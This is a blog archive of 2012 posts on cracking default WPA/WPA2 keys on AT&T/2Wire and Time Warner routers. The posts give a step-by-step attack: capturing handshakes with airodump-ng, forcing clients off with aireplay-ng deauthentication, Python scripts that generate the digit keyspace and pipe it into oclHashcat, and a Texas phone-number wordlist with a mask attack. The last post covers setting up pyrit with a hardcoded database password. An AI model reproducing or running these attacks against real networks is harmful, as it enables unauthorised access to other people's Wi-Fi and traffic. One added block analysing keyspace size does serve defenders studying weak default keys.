Showing posts with label WPA. Show all posts

UPDATE: Cracking 2WIRE WPA1/2

Tuesday, October 23, 2012 Posted by Unknown 0 comments

My previous post had a few problems with the script. I then updated the script to work properly: http://pastie.org/5101804  However, it was still way too slow. I asked around and found the following solution.

http://pastie.org/5104479



#Python 3
#Name: 2wire.py
#by: INIT_6
#Count from 0000000000 - 9999999999, skipping any number in which a digit repeats three or more times in a row (like 333)

import sys
from threading import Thread

def count1(first):
    # One thread per leading digit; each walks the remaining nine digits
    MAX_INT = 10 ** 9
    BAD_PATTERNS = {x * 3 for x in '0123456789'}
    # Use xrange for Python 2.7
    for number in range(MAX_INT):
        # Test the full ten-digit key so a run that spans the leading digit
        # (e.g. '3' + '33...') is skipped as well
        key = first + str(number).rjust(9, '0')
        if any(pattern in key for pattern in BAD_PATTERNS):
            continue
        print(key)

if __name__ == '__main__':
    for x in '0123456789':
        try:
            Thread(target=count1, args=(x,)).start()
        except Exception as errtxt:
            print(errtxt, file=sys.stderr)


There is still some work to do. I need to test the threading better and set up a queue so it only starts as many threads as the computer can handle.

Part 2. Cracking AT&T WPA1/2

Monday, September 24, 2012 Posted by Unknown 0 comments

Part 2. Cracking AT&T WPA1/2 with python script and hashcat.

This starts once you have the four-way handshake from part 1.

My Python script can be found here. It creates a CPU pool based on how many cores you have. It is based on Python 2.7.3 and a Linux OS.

What the script does is count from 000000000 to 9999999999, skipping any number that has the same digit three times in a row, so you won't get keys like 1234555678 (it repeats 5 three times). This is because AT&T decided to make their numbers "too random", which cuts their key space down. It is faster to count through and skip past the repeating numbers than to process each number.
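An added example, my own code rather than the post's script (this one or the 2wire.py above), that puts a number on the key space the script walks: a dynamic-programming count of 10-digit keys with no digit repeated three or more times in a row, cross-checked by brute force for short lengths, and the time to exhaust that space at the rates this post quotes (86K keys/s with the script, 114K keys/s with built-in brute force). It assumes nothing beyond the skipping rule the post describes.

```python
# Added example (not the post's script): how much does skipping
# "three of the same digit in a row" actually shrink a 10-digit key space,
# and how long does the rest take at the post's quoted cracking rates?

def count_keys_without_triple_runs(length, base=10):
    """Number of `length`-digit strings in which no digit occurs three or
    more times consecutively.  Dynamic programming over the length of the
    run that the string currently ends in (1 or 2)."""
    if length <= 0:
        return 1
    run1, run2 = base, 0          # one-digit strings all end in a run of 1
    for _ in range(length - 1):
        # a different digit ends any string in a run of 1 (base-1 choices);
        # the same digit extends a run of 1 into a run of 2 (a run of 3 is forbidden)
        run1, run2 = (run1 + run2) * (base - 1), run1
    return run1 + run2

def has_triple_run(digits):
    """The same rule the post's script applies to each candidate key."""
    return any(digits[i] == digits[i + 1] == digits[i + 2]
               for i in range(len(digits) - 2))

def brute_force_count(length):
    """Cross-check of the closed form; only sensible for small lengths."""
    return sum(1 for n in range(10 ** length)
               if not has_triple_run(str(n).zfill(length)))

def hours_to_exhaust(keys, keys_per_second):
    return keys / keys_per_second / 3600

if __name__ == "__main__":
    full = 10 ** 10
    reduced = count_keys_without_triple_runs(10)
    print(f"10-digit keys: {full:,}; without triple runs: {reduced:,} "
          f"({100 * reduced / full:.1f}% of the space)")
    # rates quoted in the post: 86K keys/s via the script, 114K keys/s brute force
    print(f"script path : {hours_to_exhaust(reduced, 86_000):.1f} h")
    print(f"brute force : {hours_to_exhaust(full, 114_000):.1f} h")
```

The rule removes only about 7% of the candidates, so a numeric default key of this form stays exhaustible in roughly a day on 2012-era GPU hardware; that is the point for anyone shipping such defaults.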

To change what the program starts on, open it and change the following line to whatever you want:

start = str(7)

To run the program, pipe it to hashcat-plus:

python 2wireWPAiter.py | ./oclHashcat-plus64.bin -m 2500 -a 0 --gpu-accel=160 --gpu-loops=1024 ../dir/2WIREHandShake.hccap


With AMD driver 12.8 and SDK 2.7 I get about 86K keys per second. With the built-in brute force I get 114K keys per second. I am still working on how to improve my output speed.

To get more info on hashcat look here.

Straight brute force on a known key starting with 7 saved over an hour.

Screenshots: with script / without script


Someone in the hashcat room just told me a better way of doing this to make it even faster and more accurate: using http://hashcat.net/wiki/doku.php?id=statsprocessor to make a hcstat file, utilizing Markov chains. I will do this later tonight and post my results.

Edit: you can't use Markov chains with hashcat for this. 

PART 1: Cracking AT&T WPA1/2

Posted by Unknown 0 comments
Part 1. Getting the handshake.

Aircrack's site has a pretty good tutorial.

Boot from BackTrack 5 R3.

First you want to see what kind of Wi-Fi connections you have to choose from. Start your wireless interface in monitor mode:

#airmon-zc start wlan0
#airodump-ng --encrypt wpa mon0 

You should see several APs. Record the BSSID and channel, along with any associated clients shown at the bottom of airodump-ng.

Once you find a couple of targets on the same channel, close airodump and stop airmon:

#airmon-zc stop mon0

Start airmon-zc on the channel of the target:

#airmon-zc start wlan0 <Channel Number>

Then start airodump on the same channel, along with some other options:

#airodump-ng mon0 --encrypt wpa --write FILENAME --output-format pcap -a --channel <Channel number>

The channel number needs to be the same as your target's so you can capture the full four-way handshake between the client and the AP. Airodump shows it in the top right-hand corner once you have a handshake.

Instead of waiting around for a client to connect, you can deauthenticate a client and wait for it to reconnect automatically:

#aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0


Where:
  • -0 means deauthentication
  • 5 is the number of deauths to send
  • -a 00:14:6C:7E:40:80 is the MAC address of the access point
  • -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
  • mon0 is the interface name

If you are using BackTrack you can easily check your .pcap file for a proper handshake using pyrit, or you can load up Wireshark and filter for EAPOL, which I will show in a future post.

#pyrit -r FILENAME.pcap analyze 

The output tells you whether you have a good EAPOL handshake, a workable one, or nothing at all if none are found.

To strip everything out of your pcap file except your handshakes, run the following:

#pyrit -r FILENAME.pcap -o OUTPUT.pcap strip

To turn your pcap file into a hashcat-plus-friendly file, you can upload it to https://hashcat.net/cap2hccap/ or follow the steps they give to convert it yourself. I just use their site.



Cracking Time Warner Cable Default WPA

Tuesday, June 26, 2012 Posted by Unknown 0 comments
In the Texas area I have noticed that all Time Warner Cable wireless access points are set up with the home owner's home phone number.

When I say all I really mean the 3 I have run across, but that is close enough for me.


Using http://www.telcodata.us/ I collected data for all phone numbers in Texas that belong to Time Warner and cleaned the file up using a quick and dirty Python program: TimeWarnerNum.dict


First you need to collect the 4-way handshake.


Use oclHashCat-Plus to crack the WPA1/2 password. This is optimized for my AMD graphics card; you can change the settings for your card.


./oclHashcat-plus -m 2500 capture.hccap -a 6 TimeWarnerNum.dict ?d?d?d?d --output-format=6 --gpu-accel=32 --gpu-loops=256 --perm-min=10 --perm-max=10


This appends every possible digit combination to all the numbers Time Warner owns. Because they own partial prefixes like 972-966-7, if you don't set the min and max length to 10 you will also create 11-digit numbers.


HACKING WPA w/ PYRIT

Monday, June 25, 2012 Posted by Unknown 0 comments
Getting Pyrit to work with OpenCL and a PostgreSQL database, on Kubuntu 12.04 with an AMD Radeon HD 7950 card.


You have to install the AMD Catalyst drivers and the AMD SDK. Install whichever one is older first, then the newer one, so you don't corrupt your install. Which is older will change, as they update the Catalyst drivers and the SDK at different times.


Go to AMD and download and install the drivers for your card: here
This page will help you install your drivers: here


Restart after install.


Download the latest SDK: here
This page will help you install your SDK: here


Restart after install.


name@box$: env


Check and make sure you have the following:


AMDAPPSDKROOT=/opt/AMDAPP/
LD_LIBRARY_PATH=/opt/AMDAPP/lib


Make sure everything is running correctly and the driver is loaded by running the following.
This has to be run as a normal user; the application doesn't work as root.
name@box$: fglrxinfo




Some dependencies that I ran into. This list may not be complete.

apt-get install cmake libroot-python-dev libboost1.40-all-dev subversion libpcap-dev libssl-dev python-dev zlib1g-dev python-scapy libpcap0.8-dev libpq-dev 


Install the easy_install function by following the steps here.
Now you can run:


name@box$: sudo easy_install SQLAlchemy
name@box$: sudo easy_install psycopg2



Now we are ready to install pyrit.


name@box$: wget https://pyrit.googlecode.com/files/pyrit-0.4.0.tar.gz
name@box$: wget https://pyrit.googlecode.com/files/cpyrit-opencl-0.4.0.tar.gz


name@box$ tar xvzf pyrit-0.4.0.tar.gz
name@box$ tar xvzf cpyrit-opencl-0.4.0.tar.gz


name@box$ cd pyrit-0.4.0
name@box$ sudo python setup.py build
name@box$ sudo python setup.py install


name@box$ cd ../cpyrit-opencl-0.4.0
name@box$ nano setup.py


You need to edit the setup.py file to match the below:




LIBRARIES.append('OpenCL')
try:
    if os.path.exists(os.environ['AMDAPPSDKROOT']):
        OPENCL_INC_DIRS.append(os.path.join(os.environ['AMDAPPSDKROOT'], 'include'))
        for path in ('lib/x86_64', 'lib/x86'):
            if os.path.exists(os.path.join(os.environ['AMDAPPSDKROOT'], path)):
                OPENCL_LIB_DIRS.append(os.path.join(os.environ['AMDAPPSDKROOT'], path))
                break
except:
    pass
for path in ('/opt/AMDAPP/include', \
             '/opt/AMDAPP/include/CL'):
    # the body of this loop is left as it is in the stock setup.py


ctrl+o to save
ctrl+x to exit


name@box$ sudo python setup.py build
name@box$ sudo python setup.py install




Install PostgreSQL 9 from the website.
Install pgadmin3 from the Ubuntu Software Center.


Setup new user and database. 
User:2wire 
password: putitinme  
Database: 2wireDB


To have pyrit connect to your database, do the following:
name@box$ pyrit -u postgresql://2wire:putitinme@127.0.0.1/2wireDB [pyrit command]


Now, if you don't want to type out all that nonsense each time, edit the following file:


name@box$ nano ~/.pyrit/config


Change the line that says file:// to read postgresql://2wire:putitinme@127.0.0.1/2wireDB


Ctrl+o to save
Ctrl+x to exit


Now you can simply run pyrit:


name@box$ pyrit [pyrit command]


Now it will automatically connect to the database. 


I might have left out a few steps; if you run across this page and need some help, feel free to hit me up. I know pages just like this helped me install pyrit.
